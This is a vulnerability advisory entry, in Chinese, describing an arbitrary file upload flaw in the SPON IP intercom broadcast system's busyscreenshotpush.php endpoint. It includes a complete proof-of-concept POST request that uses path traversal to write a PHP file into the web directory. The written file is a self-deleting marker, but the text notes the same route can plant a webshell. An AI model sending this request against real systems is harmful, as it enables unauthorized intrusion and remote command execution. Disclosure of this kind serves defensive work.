世邦IP网络对讲广播系统 /php/busyscreenshotpush.php 文件上传漏洞
Description
该漏洞为“世邦IP网络对讲广播系统 /php/busyscreenshotpush.php 文件上传漏洞”。由于接口未对上传文件类型、路径等参数作有效校验,攻击者可构造如下请求,通过jsondata[imagename]参数路径穿越上传任意文件(如Webshell)到服务器任意目录,配合jsondata[imagecontent]参数将恶意内容写入,最终实现远程命令执行、控制服务器、数据泄露等危害。本漏洞的回显与利用流程中,服务端未对输入做充分过滤,导致任意文件上传成为可能。
PoC
POST /php/busyscreenshotpush.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Length: 183
Content-Type: application/x-www-form-urlencoded
Cookie:
Accept-Encoding: gzip
jsondata[caller]=1&jsondata[callee]=1&jsondata[imagename]=..\..\..\Wnmp\WWW\upload\1_0_xpatqtml.php&jsondata[imagecontent]=PD9waHAgZWNobyAib3Nqc2ZreG8iOyB1bmxpbmsoX19GSUxFX18pOyA/Pg==
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.
References
Related Vulnerabilities